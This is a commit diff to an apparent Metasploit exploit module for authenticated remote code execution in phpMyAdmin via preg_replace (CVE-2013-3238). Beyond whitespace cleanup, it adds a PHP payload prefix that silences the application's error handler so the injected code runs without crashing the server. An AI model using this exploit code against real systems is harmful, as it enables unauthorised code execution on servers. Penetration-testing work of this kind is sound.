Clear out PMA's error handler

egypt · egypt · commit a0c1b6d1ce84 · 2013-04-26T15:25:09.000-05:00
* Add an error_handler function that just returns true. This prevents eventual
  ENOMEM errors and segfaults like these:
    [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error:  Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156
    [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11)
* clean up some whitespace
diff --git a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb
@@ -14,32 +14,35 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		 => 'PhpMyAdmin Authenticated Remote Code Execution via preg_replace()',
-			'Description'	 => %q{
+			'Name' => 'PhpMyAdmin Authenticated Remote Code Execution via preg_replace()',
+			'Description' => %q{
 					This module exploits a PREG_REPLACE EVAL vulnerability in PhpMyAdmin's
 					replace_prefix_tbl in libraries/mult_submits.inc.php via db_settings.php
 			},
-			'Author'	 =>
+			'Author' =>
 				[
 					'Janek "waraxe" Vind', # Discovery
 					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
 				],
-			'License'	 => MSF_LICENSE,
-			'References'	 =>
+			'License' => MSF_LICENSE,
+			'References' =>
 				[
 					[ 'CVE', '2013-3238' ],
 					[ 'PMASA', '2013-2'],
 					[ 'waraxe', '2013-SA#103' ],
 					[ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
 				],
-			'Privileged'	 => false,
-			'Platform'	 => ['php'],
-			'Arch'		 => ARCH_PHP,
-			'Payload'	 =>
+			'Privileged' => false,
+			'Platform'   => ['php'],
+			'Arch'       => ARCH_PHP,
+			'Payload'    =>
 				{
 					'BadChars' => "&\n=+%",
+					# Clear out PMA's error handler so it doesn't lose its mind
+					# and cause ENOMEM errors and segfaults in the destructor.
+					'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"
 				},
-			'Targets'	 =>
+			'Targets' =>
 				[
 					[ 'Automatic', { } ],
 				],
@@ -48,7 +51,7 @@ def initialize(info = {})
 
 		register_options(
 			[
-				OptString.new('URI',   [ true,	"Base phpMyAdmin directory path", '/phpmyadmin/']),
+				OptString.new('URI',      [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
 				OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
 				OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
 			], self.class)
@@ -137,7 +140,6 @@ def exploit
 		end
 
 		db = rand_text_alpha(3+rand(3))
-
 		exploit_result = send_request_cgi({
 			'uri'	=> uri('db_structure.php'),
 			'method' => 'POST',
